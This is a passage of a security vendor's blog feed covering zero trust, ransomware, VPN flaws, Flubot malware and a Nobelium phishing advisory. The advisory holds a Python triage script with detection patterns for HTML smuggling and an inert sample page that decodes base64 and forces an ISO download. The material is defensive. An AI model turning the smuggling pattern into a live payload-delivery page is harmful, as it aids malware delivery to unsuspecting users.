enterprise transformation is to happen, it will be Chief Information Security Officers (CISOs) who lead it. This crisis represents an opportunity for CISOs to build on transformation momentum—but only if they leave behind old-world thinking. CISOs and their security teams must stop trying to mold legacy networks and security models to fit an evolving business world, and instead recognize security as an engine to drive strategy.
Before the crisis As infrastructure and applications have “decentralized” to the cloud, progressive IT organizations have begun retiring outdated, vulnerable, perimeter-based legacy “castle-and-moat” security architectures that aimed to protect on-premises data from outside threats. At the same time, they are sunsetting similarly archaic “hub-and-spoke” network models that backhaul corporate traffic through the data center. The vision: A cloud-based services model, with direct connectivity to applications and internal resources. The current crisis has become a litmus test of cloud-migration commitment: Enterprises well on their way to embracing network and security transformation fared better than ones that had put off major network and infrastructure overhauls. Crisis is a disruptor The etymology of the word “crisis” includes the notions of “judgment” (perception of risk, its imminence, and related impact) and “decision” (reactions to and strategies for embracing change). Judge what risks are faced, then decide what actions to take. Crisis “pain” stems from an inability to take the actions needed based on those judgements and decisions. Crisis management is an essential component of business strategy. Over the last decade, with the overwhelming shift of business to online models, the focus of crisis management has been around IT security rather than physical implications. The unprecedented COVID-19 health crisis happened as many companies were on their way to enacting new security and network architectures. How much pain the crisis caused each business often depended on the maturity of their transformation process. Currently, many workforces can’t get back into the office. These same workforces need to perform vital company functions—wherever they sit. How do you securely connect remote workforces to cloud-based and on-premises resources? In the legacy, secure-the-perimeter world, VPNs would be the only option. 
But VPNs can’t easily (or affordably) scale to accommodate dramatic traffic volume growth. Worse, VPNs also pose higher security risks: How do you secure the perimeter of a corporate network that now encompasses the entire internet? Connecting users to the corporate network from unmanaged endpoints exposes network access paths, allows unmanaged east/west traffic communication across the network, requires complex policy definition, limits comprehensive monitoring, provides bad user experiences, and creates architecture headaches. In the modern world, where data does not always (or even often) reside in the data center, backhauling internet traffic through the corporate network then back out to the cloud no longer makes sense. It’s inefficient and expensive. Traffic should take the path of least resistance, go direct-to-cloud, and provide a fast and seamless experience. As such, the pandemic caused more “crisis pain” for companies clinging to legacy security and network architectures than it did for companies that were well down the path of their digital transformation journey. Using our crisis etymology, digitally transformed companies could make judgments about crises' business ramifications and then agilely decide on responses. They could enable work-from-anywhere experiences with little to no impact to work efficiency. Other, less-mature companies struggled. To enable remote access, they were forced to improvise, then pivot to (what were for them) new network and security architectures—changes that came with high costs and impacts to productivity. Don’t get disrupted by crisis Cloud services have become so integral to business strategy, operations, and productivity that their effective enterprise use influences business performance and earning power. The pandemic has shown that companies must react quickly to dramatic change. And companies that leverage the cloud are more agile than organizations that don’t. We can’t easily predict the future. 
Is company-wide telecommuting here to stay? Are brick-and-mortar offices on the way out? Maybe, maybe not. But the future will look different: telecommuting (in whatever form) isn’t going away, and CISOs must prepare for “work from anywhere” in future business strategies. Should CISOs seek to make incremental improvements to legacy systems so that they continue to limp along? Or should they embrace new business models that enable network transformation? (Hint: It’s the latter.) Change can be hard. But now is the right time to rethink network infrastructure. For some, “digital transformation” may have just been a buzz phrase before the pandemic. But now it’s a mission, and a path forward to enterprise agility. Network and security architectures must have the flexibility to address company-wide change—and address it quickly—for enterprises to remain functional. And that means decentralization of network resources, and migration to the cloud. Secure Access Service Edge (SASE) and Zero-Trust Network Access (ZTNA) represent the future of enterprise architectural agility and resilience. I work for a company that helps companies use the new cloud-driven model as it was intended: as a decentralized infrastructure that engenders growth and productivity. The pandemic has challenged everyone, but we cannot “let it go to waste.” In response to the current crisis, today’s CISOs must learn from it and pivot to transformation. Otherwise, they will fall further behind, and be even less prepared the next time a difficult situation arises. Will your enterprise disrupt or be disrupted by the next crisis? Fri, 04 Jun 2021 10:18:36 -0700 Nicolas Casimir Coverage Advisory For Email Based Attack From Nobelium Background: On May 27, Microsoft published a blog on a sophisticated attack conducted by the threat actor it tracks as Nobelium.
While the threat actor is believed to have changed the initial attack vector multiple times in the past few months, the latest technique, abusing a mass-mailing service to send spear-phishing emails, targeted approximately 3,000 email accounts in approximately 150 organizations, including government, non-government, military, IT services, think tanks, health services, research, and telecommunications. The same threat actor, Nobelium, is also believed to be behind the massive supply chain attack against SolarWinds disclosed in December 2020. What is the issue The threat actor, Nobelium, is using unique infrastructure for each target, which makes the attack harder to detect with shared indicators. The attack starts with a malicious email campaign asking the victim to download and open an HTML file. When opened, the HTML file writes an ISO image to disk, which is then mounted as a drive. A shortcut (LNK) file in the ISO is executed first, and it loads a Cobalt Strike Beacon onto the system. After execution, the threat actor establishes persistence on the system and performs post-exploitation activities such as lateral movement and data exfiltration. Microsoft has provided technical analysis of the attack here. Best practices/guidelines to follow: Route all server traffic through Zscaler Internet Access, which will provide the visibility needed to identify and stop malicious activity from compromised systems/servers. Restrict traffic from critical infrastructure to an allow list of known-good destinations. Ensure you are inspecting all SSL traffic. Turn on Advanced Threat Protection to block all known command-and-control domains. Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Use Advanced Cloud Sandbox to prevent unknown malware delivered as a second-stage payload.
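The delivery chain described above (an HTML attachment that reconstructs an ISO in the browser, writes it to disk, and relies on a LNK inside the image to start the Beacon) is commonly called HTML smuggling. The following is an added triage example written for this page, not code from Microsoft, Zscaler, or the advisory: it scans an HTML file for the script calls that typically rebuild and force-download a payload, decodes any long base64 literal, checks whether the result carries the ISO 9660 volume descriptor identifier, and looks for LNK file identifiers inside it. The indicator strings, score thresholds, and the sample HTML/ISO are all constructed assumptions for the demonstration, not artifacts from the campaign.

```python
import base64
import re

# Script calls typically used to rebuild a payload inside the browser and
# force a download (HTML smuggling). These indicator strings are an
# assumption for this example, not signatures taken from the campaign.
SMUGGLING_APIS = ("atob(", "new Blob(", "URL.createObjectURL(", "msSaveOrOpenBlob(")

# An ISO 9660 image carries the identifier "CD001" at byte 0x8001, the start
# of the primary volume descriptor (sector 16 of 2048-byte sectors).
ISO_MAGIC_OFFSET = 0x8001
ISO_MAGIC = b"CD001"

# A long quoted base64 literal is the usual carrier for the smuggled payload.
B64_LITERAL_RE = re.compile(r'["\']([A-Za-z0-9+/]{512,}={0,2})["\']')
DOWNLOAD_ISO_RE = re.compile(r'\.download\s*=\s*["\'][^"\']*\.iso["\']', re.I)
# Crude on purpose: scan raw bytes for ISO 9660 file identifiers ("NAME.LNK;1")
# instead of walking the directory tree; good enough for triage.
LNK_NAME_RE = re.compile(rb"[A-Z0-9_]{1,30}\.LNK;1")


def extract_payloads(html: str) -> list:
    """Decode every long base64 literal found in the HTML."""
    payloads = []
    for match in B64_LITERAL_RE.finditer(html):
        try:
            payloads.append(base64.b64decode(match.group(1), validate=True))
        except ValueError:
            continue  # looked like base64 but was not
    return payloads


def looks_like_iso(data: bytes) -> bool:
    """True if the bytes carry the ISO 9660 primary volume descriptor identifier."""
    end = ISO_MAGIC_OFFSET + len(ISO_MAGIC)
    return len(data) >= end and data[ISO_MAGIC_OFFSET:end] == ISO_MAGIC


def triage_html(html: str) -> dict:
    """Score an HTML file for smuggling indicators and an embedded ISO/LNK."""
    apis = [api for api in SMUGGLING_APIS if api in html]
    download_iso = DOWNLOAD_ISO_RE.search(html) is not None
    isos = [p for p in extract_payloads(html) if looks_like_iso(p)]
    lnk_names = sorted({m.group(0).decode() for iso in isos
                        for m in LNK_NAME_RE.finditer(iso)})
    score = (len(apis) + (2 if download_iso else 0)
             + (3 if isos else 0) + (2 if lnk_names else 0))
    verdict = "suspicious" if score >= 5 else ("review" if score else "clean")
    return {"apis": apis, "download_iso": download_iso, "iso_payloads": len(isos),
            "lnk_names": lnk_names, "score": score, "verdict": verdict}


def build_sample_html() -> str:
    """Constructed sample (not the campaign's file): a fake ISO image with a
    valid volume descriptor identifier and one LNK file identifier, embedded in
    a page that decodes it and triggers a download through an anchor click."""
    fake_iso = bytearray(0x9000)             # 18 zeroed 2048-byte sectors
    fake_iso[0x8000] = 1                     # descriptor type 1 = primary
    fake_iso[0x8001:0x8006] = ISO_MAGIC
    fake_iso[0x8800:0x8800 + 11] = b"SETUP.LNK;1"
    blob = base64.b64encode(bytes(fake_iso)).decode()
    return f"""<html><body><script>
var data = "{blob}";
var bytes = Uint8Array.from(atob(data), function(c) {{ return c.charCodeAt(0); }});
var file = new Blob([bytes], {{type: 'application/octet-stream'}});
var a = document.createElement('a');
a.href = URL.createObjectURL(file);
a.download = 'attachment.iso';
a.click();
</script></body></html>"""


if __name__ == "__main__":
    print(triage_html(build_sample_html()))
```

Run it against a saved attachment with `triage_html(open(path, encoding="utf-8", errors="ignore").read())`. The byte-level LNK scan will miss Joliet (UTF-16) names and images where the payload is obfuscated before base64 encoding; treating the presence of the smuggling API calls plus an `.iso` download name as enough to route the file to a sandbox is the safer policy.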
Limit the impact from a potential compromise by restricting lateral movement with identity-based micro-segmentation (Zscaler Workload Segmentation) and a Zero Trust architecture. Safeguard crown-jewel applications by limiting lateral movement using Zscaler Private Access. Zscaler coverage: Zscaler leveraged the countermeasure details published by Microsoft to ensure coverage. Enhanced protection has been added wherever necessary across multiple layers of the Zscaler security platform. Below are the threat names of the existing detections:
Advanced Threat Protection:
Win32.Backdoor.Cobaltstrike.LZ
Win32.Trojan.Nobelium.LZ
Malware Protection:
Win32.Trojan.NOBELIUM
Win64.Backdoor.CobaltStrike
HTML.Dropper.EnvyScout
LNK.Downloader.CobaltStrike
PDF.Trojan.NOBELIUM
Details related to these threat signatures can be found in the Zscaler Threat Library. Advanced Cloud Sandbox: We have ensured that Zscaler Cloud Sandbox flags these Indicators of Compromise (IOCs) and also protects against unknown indicators. As always, Cloud Sandbox plays a critical role in blocking custom variants that may be developed from these tools. The Zscaler ThreatLabZ team is also actively monitoring this campaign and any activity around Nobelium to ensure coverage for newer IOCs as they are discovered. Wed, 02 Jun 2021 00:36:33 -0700 Amit Banker Responsible Organizations Must Take Decisive Actions After a Ransomware Attack This post also appeared on LinkedIn. The recent spate of ransomware attacks and the release of the new cybersecurity Executive Order foreshadow increased scrutiny for companies managing critical infrastructure and personal data. Ransomware attacks are happening more frequently: besides the Colonial Pipeline attack, last week saw Ireland’s health systems shut down, and attackers compromised AXA Partners after it announced its insurance policies would no longer cover ransomware demands.
Attacks like the one on Colonial Pipeline bring profound real-world implications: millions of people without services, millions lost in revenue, reputations tarnished, general societal chaos and dysfunction, and attackers paid and free to hit other targets. Ransomware attacks have been the norm for more than seven years now. Many organizations, private and public, small and large, have been victims of such attacks. And yet, companies continue to underestimate the risk of cyberattacks, especially ransomware. So why isn’t ransomware a top priority for everyone? A previous audit of Colonial Pipeline showed severe security posture flaws, and one researcher said, “an eighth-grader could have hacked into that system.” The recent Executive Order on Improving the Nation’s Cybersecurity and more stringent privacy laws such as GDPR and CPRA are going to make the ramifications of data theft interesting. Norsk Hydro’s response to a ransomware attack in 2019 was a model of change that showed a deep desire to learn, improve, and (most importantly) protect the data that the company had in its trust. They used the attack to rebuild their network security from the ground up using zero trust architectures that connect users to applications directly and limit lateral movement across systems by monitoring workflows across different cloud deployments. Will Colonial Pipeline follow suit? What have we learned from the Colonial attack? It wasn’t a targeted attack on the Industrial Control Systems (ICS) or Operational Technology (OT). Unlike the attack on Saudi Aramco in 2017, there is no indication that this attack caused physical damage to the pipelines or endangered plant operations personnel. This was most likely an attack that locked up the IT systems that managed operational inventory and logistics. Paying the ransom is not going to restore your operations in time. A well-planned and tested backup and restore strategy can save the day. Paying the ransom only encourages more attacks.
An 81-page urgent action plan delivered to the White House in April 2021 by a public-private task force noted that enriching ransomware criminals only fuels more global crime, including terrorism. Insurance companies are starting to exclude ransom payments. In an apparent industry first, the global insurance company AXA said Thursday it would stop writing cyber-insurance policies in France that reimburse customers for extortion payments made to ransomware criminals (and then promptly got hit with a ransomware attack). The US government is finally taking notice. The new Biden Administration executive order requires organizations to go beyond the compliance-based approach: “Within 60 days of the date of this order, the head of each Federal agency shall …develop a plan to implement Zero Trust Architecture.” Prevention is a lot less expensive than mitigating the aftermath of an attack. It is easy to see that the loss of revenue from unplanned downtime far exceeds any investment in defending against such attacks. Why was Norsk Hydro’s response to a ransomware attack the gold standard? Ransomware attacks can be mitigated and prevented. Companies like Norsk Hydro have dealt with such attacks in the past and shared the wisdom with the world. What did they do? Norsk Hydro did not pay the ransom. The company went public with the news of the attack and was transparent about its response plan. The company reported the attack to authorities and worked closely with the security industry to prevent attacks on other companies. Norsk Hydro used the opportunity to rebuild, redesign, and strengthen its security and infrastructure. The company is not in denial about the likelihood of future attacks. Even with the best planning, the reality of a successful attack is harder than any plan anticipates. For example, Norsk Hydro couldn’t use any of its printers to print safety procedures for plant staff.
“Had Hydro not already moved communications to a managed cloud service like O365, the situation would have been more grave.” - Chief Financial Officer (CFO), Eivind Kallevik. What should your organization do to plan for and prevent ransomware attacks? Assess the business risk of your IT and OT architecture and reduce your attack surface: Don’t go directly into ICS threat monitoring without analyzing the entire attack surface. Ask the right questions when assessing your security posture. Do you have a flat network? Are your IT and OT networks sharing the same resources (e.g., domain controllers)? Do your IT security solutions from different vendors natively work together (like your secure web gateway integrating with your endpoint security and SIEM solution) to break the kill chain? Consider extending zero trust to your OT environments. Attackers cannot get to systems they cannot see on the open internet. Air-gapped OT networks do not serve the business’s needs: allow internet access for ICS workstations through browser isolation instead. ICS employees with two laptops create complexity that leads to security issues. Replace VPNs with zero trust network access (ZTNA) using a software-defined perimeter approach for remote access to your OT systems. Apply segmentation: Segment the control, management, and IIoT sensor networks in OT environments. Don’t aim for full micro-segmentation, as there is not enough downtime on the OT network to implement it. Protecting the intersection of OT and IT will yield the most benefit. Use the cloud to your advantage: Learn from Norsk Hydro’s experience and move as many functions as possible into the cloud. This allows for faster recovery and better protection of critical systems. A Secure Access Service Edge (SASE)-based security implementation is an easy way to reduce your ICS network’s attack surface and complexity.
In the SolarWinds attack, a weak password on SolarWinds infrastructure, reportedly set by an intern, was among the lapses cited in a breach that reached thousands of enterprises and government organizations, jeopardizing national security. The shared password used at the water treatment plant in Oldsmar, Florida, risked the lives of an entire city. The recent executive order demonstrates a commitment to improving the security posture of the United States’ critical infrastructure. Since private companies manage much of that infrastructure, one would hope the order extends to them as well. The actions of companies handling critical infrastructure affect millions of people. Companies responsible for critical infrastructure must use the best security practices in order to ensure public safety and well-being. Tue, 25 May 2021 08:00:02 -0700 Deepak Patel Got VPN? It’s Only a Matter of Time Before You’re the Next Cyberattack Headline. This post also appeared on LinkedIn. Legacy VPN technology puts business operations at risk Listen in as we discuss this and many more topics on the podcast The CISO's Gambit. Virtual Private Network (VPN) technology carries risk. By design, a VPN effectively extends your network to a remote endpoint, or in the case of a fully remote workforce, to thousands or tens of thousands of remote endpoints. But a worse risk—one that isn’t often talked about—is that the VPN service itself is exposed to the internet, inviting attack. The VPN was designed more than 25 years ago. Despite the performance limitations VPNs impose and the enterprise-threat vulnerabilities they introduce, VPNs remain a commonly employed method for enabling remote access. They are easy to set up, often included with firewall subscriptions, and, once up and running, relatively straightforward to maintain. And though VPNs promise a secure connection from a remote endpoint to the destination gateway, the VPN itself is exposed, and vulnerable to direct internet-based attacks.
Across all industries and verticals, VPN services pose a significant risk to organizations. It’s the legacy VPN-based architecture that's the real issue. The risk is significant, and that’s an understatement. Let’s look at some recent examples of exploited VPN services. The first is a newly disclosed critical authentication bypass vulnerability in Pulse Connect Secure, a widely used SSL remote-access solution. Threat intel reporting indicates this vulnerability is being actively exploited by threat actors, and could be leveraged to obtain access to internal networks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued Emergency Directive 21-03, “Mitigate Pulse Connect Secure Product Vulnerabilities,” requiring all Federal Agencies to identify and mitigate the vulnerabilities (CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the most recently disclosed CVE-2021-22893) by April 23, 2021. Second, FBI and CISA issued a joint cybersecurity advisory that nation-state threat actors have been observed exploiting vulnerabilities in Fortinet SSL VPN (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591) to gain access to multiple government, commercial, and technology services networks. Once initial access to the network is obtained, traditional exploitation techniques are used to propagate and entrench that access. Right now, organizations around the world are in a frantic race to patch Pulse Secure vulnerabilities before threat actors can exploit them. Just a few weeks ago, organizations that used Fortinet VPN hardware were in the same situation. In the past two years, all of the leading VPN appliance vendors—Citrix (NetScaler), Palo Alto Networks, Cisco, Pulse Secure—have acknowledged critical and remotely exploitable vulnerabilities in their public-facing remote-access/VPN services.
This is why it is critical for agencies and organizations to embrace security transformation and move away from legacy VPN-based architectures for remote access. Time is not on your side. Whenever a new exploit is discovered, the race is on...for both good and bad actors. Exploit developers work to turn proof-of-concept code into working attacks and integrate it into their exploit toolkits. Meanwhile, customers scurry to implement patches, vendor fixes, hardware upgrades, or compensating controls to mitigate exposure. These flaws aren’t that difficult to exploit. APT actors around the world can pump out exploit code very quickly, but once exploit code is publicly available, even an unskilled attacker can use a framework like Rapid7’s Metasploit or Core Impact to compromise and gain access to a targeted network. To make matters worse, these vulnerabilities are just the ones we know about. I am more concerned about the ones that haven’t yet been disclosed. Just because a public disclosure isn’t out for a particular remote-access vendor’s solution doesn’t mean that hardware-based VPN solution is safe from attack. Offensive cyber teams around the world (and yes, in the United States too) work around the clock to discover the next remotely exploitable zero-day vulnerability. With the COVID-imposed advent of fully remote workforces, VPN targets are high-value, especially for attackers that have full government backing and the resources to discover exploitable flaws. Most vendors work diligently to keep up with the onslaught of attacks. But it’s not enough for enterprise VPN users. Once a critical vulnerability has been disclosed, you’re likely already behind the curve and should assume you may already be compromised. A moderately skilled pen tester can easily exploit these security holes, use them to breach your network, and leverage them to move throughout your environment.
But it’s not just moderately skilled attackers that you have to worry about: MITRE ATT&CK currently tracks 110 adversary groups, and exploitation of public-facing services such as VPNs is an initial-access technique mapped to many of them. Imagine the extent to which an advanced state-sponsored actor could leverage these remotely exploitable vulnerabilities. Eliminate the VPN attack surface to reduce business risk. According to the Zscaler 2021 VPN Risk Report: 93% of companies are still employing VPN services, yet 94% are aware that cybercriminals are targeting VPNs to gain access to network resources. 72% of organizations are concerned that VPN may jeopardize IT’s ability to keep their environments secure. 67% of enterprises are considering a remote access alternative to a traditional VPN. VPNs are a significant risk to your business. At the end of the day, users need to access applications, not become an extension of the corporate network. There is a better way to secure work-from-anywhere connectivity that eliminates this risk and enhances user experience. In a reverse proxy-based security architecture, your apps are never exposed to direct internet-based attacks, and you eliminate the risk that a sophisticated threat actor will exploit your legacy VPN remote access solution. Thu, 27 May 2021 10:38:12 -0700 Danny Connelly Zscaler Protections Against Flubot Banking Malware A huge wave of the Flubot malware has been making its rounds in the wild, primarily targeting users in Europe -- particularly the UK -- and in the US. Flubot is an Android banking malware which lures victims into installing the app and then steals the victim's bank credentials. Flubot has a full set of banking-trojan capabilities, of which overlay attacks are the most prominent. It can also bypass financial institutions' multi-factor authentication (it steals SMS messages, including those carrying one-time codes).
According to Threatpost, “The U.K.’s National Cyber Security Centre (NCSC) has issued security guidance about how to identify and remove FluBot malware, while network providers including Three and Vodafone have also issued warnings to users over the text message attacks”. Initial Phase Flubot's infection cycle starts with an SMS message luring victims by stating that they have either missed a parcel or that a new parcel is arriving. The SMS message contains a malicious link, which redirects users to a compromised website that downloads the Android banking malware. Figure 1: Flubot smishing link. The downloaded app, Flubot, portrays itself as one of the delivery apps from “FedEx,” “DHL,” or “Correos”, and in some cases as “Chrome”. Figure 2: Malware icons. Features Flubot is a typical Android banking malware, which consists of the following key features:
Steals SMS messages
Steals contacts
Spreads itself by messaging the contact list
Reads notifications
Gets the list of installed applications
Uses Accessibility Services
Deletes apps from the compromised device
Performs calls
Steals credit card information using fake system overlays
Some of the unique features include using a Domain Generation Algorithm (DGA) to contact command and control (C&C) servers and encrypting part of the communication sent to C&C servers using RSA encryption. It can also disable Google Play Protect via Android’s Accessibility feature. Once installed, the malware keeps a watch on the applications opened by the victim. If the app turns out to be one of the targeted banking apps, it shows a fake overlay screen to the victim and eventually steals credentials. Flubot also has the capability to steal credit card information by displaying a fake Google verification page.
Figure 3: Credit card theft. An in-depth analysis of Flubot malware was done by Prodaft and can be found here (pdf). Zscaler Coverage Zscaler’s defense-in-depth approach prevents the infection at each step, eventually breaking the complete attack kill chain. References to the Zscaler Threat Library and Flubot definitions can be found here. As seen in the screenshot below, Zscaler’s advanced sandbox detects the Flubot variants analyzed. Figure 4: Zscaler Cloud Sandbox detections. Conclusion Due to the ubiquitous nature of the Android operating system, attacks on its users are inevitable and will keep increasing at a rapid pace. Android users should always be wary of the presence of mobile malware. Malware such as Flubot has the full potential to compromise victims with features like stealing banking credentials and bypassing multi-factor security measures. It is always advisable to stay away from third-party sources distributing Android apps, and to distrust any random links presented to you via email and/or SMS messages. Zscaler customers are protected from such types of attacks. The Zscaler security team, ThreatLabZ, provides proactive coverage against advanced threats targeting Android banking apps, such as Flubot. ThreatLabZ also tracks various Android malware families along with advanced persistent threats (APTs) pertaining to the Android ecosystem and ensures coverage for all the latest malicious indicators. Thu, 27 May 2021 07:46:36 -0700 Shivang Desai The Colonial Pipeline Cyberattack and The Executive Order: A CISO’s Perspective This post also appeared on LinkedIn. The ransomware event at Colonial Pipeline highlights the need for major cyber improvements across the public and private sectors. It was likely the impetus behind the Biden Administration issuing the much-anticipated Executive Order on Improving the Nation’s Cybersecurity on May 12.
This executive order offers aggressive actions and goals towards improving the cybersecurity posture of the national infrastructure. My initial reaction: THANK YOU! The Executive Order was under development for some time and certainly isn’t only about the Colonial Pipeline or SolarWinds crises. It’s a reaction to the growing gap between public infrastructure cybersecurity postures and the possible damage from cyber threats to public health, services, and safety. Ransomware is a growing problem everywhere. In the past four days, we’ve seen Ireland’s health service IT systems taken down by ransomware, and—after stating that it was dropping insurance reimbursement for ransomware extortion payments—AXA Partners was hit as well. The executive order promotes game-changing strategies and specific measures for fighting the risk and damage from cyber threats in the United States. Sharing threat intel We still don’t know the details of the attack vector, timeline, or indicators of compromise (IOCs) for the Colonial Pipeline breach. That’s a problem. Sharing threat intelligence is critically important for several reasons, but the most important one is that knowing the tactics, techniques, and procedures (TTPs) helps incident responders uncover attacks that otherwise wouldn’t have been detected and implement preventive measures. The Cybersecurity and Infrastructure Security Agency (CISA), which includes the National Cybersecurity and Communications Integration Center (NCCIC) and the Hunt and Incident Response Team (HIRT), has dedicated experts ready to manage and assist with events like this. Colonial Pipeline is critical infrastructure, and CISA’s mission is specifically to address cyber issues affecting national security. EO Section 2, “Removing Barriers to Sharing Threat Information,” highlights the importance of CISA’s role and the need to report breaches in an accurate and timely manner.
While the FBI attributed the attack to DarkSide—a group known for exploiting public-facing services—there are still many unanswered questions. We do know that DarkSide exfiltrated nearly 100GB of data and threatened to publish it on the Internet, in addition to encrypting it and making it unusable. This is known as a “double-extortion attack” in that it provides the attacker with more ransom leverage: “We’ll give you the key to unlock your on-premises data, but if you think you can just restore the data via backups, we’ll release that data into the wild.” Zscaler’s ThreatLabZ team recently published a detailed report focused on the increase of double extortion ransomware. It’s time to make the shift Given DarkSide’s modus operandi, we can assume they got their foothold at Colonial via a remotely exploitable vulnerability in a public-facing application. Figure 1: Darkside - MITRE ATT&CK Tactics and Techniques But there are many different vectors (phishing, drive-by download, malicious USB drive, etc.) that could lead to the same result. Modernizing cybersecurity infrastructure, security posture, and standards compliance across public and private entities—especially when both work together to manage critical infrastructure—is an immediate priority. The new executive order calls for strengthening incident detection, response, and mitigation to reduce the likelihood that a single security incident becomes a significant security event. Organizations must shift from legacy network-centric security to successfully combat today’s threats: attackers are likely targeting you right now. Zero Trust architectures prevent cyberattacks from propagating laterally across an organization’s IT infrastructure (a point I highlighted recently). Section 3 of the executive order, “Modernizing Federal Government Cybersecurity,” is a crucial component.
It explains how the move to cloud (IaaS, PaaS, SaaS) technologies, remote work, hybrid cloud/on-premises environments, and IT systems that process data or operate machinery (such as IoT/OT devices) requires significant investment in zero trust-based solutions to modernize cybersecurity capabilities. Each agency must develop a plan to implement a zero trust architecture that aligns with NIST 800-207 and submit an implementation timeline.

But what is zero trust?

“Within 60 days of the date of this order, the head of each agency shall…develop a plan to implement Zero Trust Architecture.” - The White House

I get to speak to cybersecurity leaders across many industries. I often ask what they think Zero Trust means. I hear a lot of different answers depending on context and concerns. Zero Trust has evolved. It encompasses ten years of security best practices designed to protect the cloud services, software, and infrastructure that make digital transformation a plausible reality. At its core, it means connecting users directly to applications on a least-privileged or default-deny basis.

Implementing “zero trust” access using traditional network-centric security capabilities is difficult to manage and maintain. Overseeing the access control lists (ACLs) and firewall rulesets needed for applications to function without opening massive security holes is problematic for businesses that need agility and resilience. Network-centric security technologies also don’t adequately prevent lateral movement. Why? Firewalls live at the perimeter of a network: once you’re through, they don’t protect the rest of the systems. Controlling internal traffic therefore means using internal firewalls, network segmentation, zones, VLANs, etc. Configuring, troubleshooting, and maintaining these rulesets often results in overly permissive access to internal applications.
What’s the point of implementing network segmentation if holes in security rules allow NetBIOS/SMB or Remote Desktop Protocol (RDP) to communicate bidirectionally with Active Directory (AD) and other core support services? We must abandon network-centric security approaches and embrace zero trust solutions to defend successfully against today’s threats. The latest executive order includes a definition of Zero Trust architectures in Section 10, “Definitions,” and references the NIST Zero Trust Architecture standard (NIST 800-207). TIC 3.0 and NIST 800-207 guidance have opened the door for agencies to adopt modern, cloud-based zero trust security solutions that cover cloud technologies (IaaS, PaaS, SaaS), on-premises or hybrid environments, and IT systems that process data or operate machinery (OT devices).

Containment is critical

There is an invisible and never-ending chess match between cyber attackers and IT security. The more effective the cybersecurity capabilities are, the harder attackers work to develop new and more evasive attack techniques. While phishing is the most common attack vector for threat actors to obtain initial access to an agency endpoint, another common vector is vulnerabilities in public-facing applications exposed to the internet. Whether it is a vulnerability on a VPN concentrator or within a web application, quickly containing an attack prevents lateral movement and mitigates the damage from a breach. Again, I was pleased to see Section 7, “Improving Detection of Cybersecurity Vulnerabilities and Incidents on Federal Government Networks,” included in the executive order. It calls for a government-wide endpoint detection and response (EDR) capability. The speed at which you can identify and contain a compromised endpoint, node, account, etc., determines the severity and extent of a breach. This isn’t possible unless you leverage EDR capabilities that use integrated AI/ML to facilitate automated responses.
The challenge ahead

The Colonial Pipeline attack and other events over the last few weeks are unfortunate and demonstrate weaknesses in the current state of our cybersecurity. But this is an excellent opportunity for those who understand the challenges to make a shift and implement the cybersecurity capabilities necessary to protect and defend enterprises and infrastructure from dangerous attacks effectively. The technology is ready. The real challenge is shifting people’s mindset and company culture to embrace better cybersecurity and digital transformation. The new Biden Administration executive order tells the nation that it’s time to modernize cybersecurity across the board and includes aggressive actions for what’s needed: abandon old thinking, modernize outdated security capabilities, and adopt zero trust architectures. To those who helped create the “Executive Order to Improve the Nation’s Cyber Security,” well done! For the frontline cyberwarriors who selflessly dedicate their careers to protecting the mission, thanks for your dedicated service, and keep fighting the good fight!

Tue, 18 May 2021 08:00:01 -0700 Danny Connelly

Zscaler is the 2021 Zero Trust Champion at Microsoft’s 20/20 Partner Awards Ceremony

In my previous blog, I was proud to share that Zscaler was nominated for two awards from the Microsoft community, including Zero Trust Champion of the Year. On May 12, Microsoft announced the award winners at its 20/20 Partner Awards ceremony, a prestigious event recognizing industry excellence in a number of key areas. I couldn’t be more grateful to the Microsoft community to announce that Zscaler has won the Zero Trust Champion of the Year award, beating out a strong field of competitors. This award validates our forward-looking vision and the significant innovation behind our zero trust architecture, which is reimagining how leading enterprises safeguard their digital business in today’s mobile and cloud-first world.
This recognition comes on the heels of the landmark Executive Order on Federal Cybersecurity from the Biden Administration, which puts zero trust at the forefront of both public and private efforts to transform security to become more agile and resilient and to significantly reduce risk.

We believe wholeheartedly in three fundamental principles of zero trust

Zero trust has generated a massive amount of noise across the industry for good reason—it’s the only way to disrupt the attack equation and get ahead of highly intelligent, rapidly evolving adversaries. With users, data, and applications everywhere, there needs to be a different approach: one that is cloud-native, optimized for the needs of the modern enterprise, and adaptable to the ever-changing threat landscape. Zscaler believes a true zero trust architecture must be built on the following three tenets:

Zero network access: connect users to apps, not corporate networks, to prevent lateral movement.
Zero attack surface: make apps invisible so they can’t be attacked.
Zero passthrough connections: deny all privileges; utilize a proxy architecture for better cyberthreat prevention and data protection.

It has become evident that legacy network security architectures can’t deliver on the promise of zero trust, as adapting traditional solutions to this new era introduces massive complexity and cost without improving security. The Microsoft Zero Trust Champion of the Year award recognizes Zscaler’s approach to delivering a comprehensive zero trust architecture, one made all the more meaningful by being selected by the Microsoft Intelligent Security Association (MISA) members, who were solely responsible for voting on this year’s winners. Together with Microsoft, we will continue to deliver exceptional security outcomes to our customers, built on a foundation of the industry’s leading zero trust architecture, the Zscaler Zero Trust Exchange. Thank you to the MISA members and Microsoft for this honor.
Recognition amongst our peers in the industry is humbling, and we are grateful for your confidence in our strategy and execution of providing zero trust to our customers.

Don’t miss our joint breakout session at Zenith Live

In a few weeks, Zscaler will be hosting its virtual Zenith Live conference, with this year’s theme being Full Cloud Ahead. In our joint session, you will hear from experts at Zscaler and Microsoft about actionable cloud-based zero trust solutions and crucial strategies to stay ahead of today’s most advanced threats. Our experts will discuss the strategies and technologies required for a true zero trust architecture and how you can make zero trust a reality for your organization.

Register for Zenith Live here:

We hope to see you there! Thank you again to Microsoft and the Microsoft Intelligent Security Association for this opportunity and recognition.

Mon, 17 May 2021 15:07:00 -0700 Punit Minocha

How CSPM Secures Your Public Multicloud Environment

Public cloud brings tremendous advantages to enterprise IT teams, including significant flexibility and agility, along with economies of scale. It allows the organization to set up the required infrastructure much faster than on-premises and provides unmatched business scalability and extra security capabilities. The benefits of agility and efficiency come with the challenge of securing assets and workloads in the cloud. The rapid adoption of public clouds—AWS, Azure, GCP—and an increasing number of cloud services has created an explosion of data and identity complexity with unmanaged risk.

Why is it essential to maintain a secure posture?

Despite high-profile data breach incidents, the disciplined use of the public cloud is secure. The secret to adequate public cloud security is improving the overall security posture. Security posture has an inverse relationship with cybersecurity risk: as security posture improves, risk decreases.
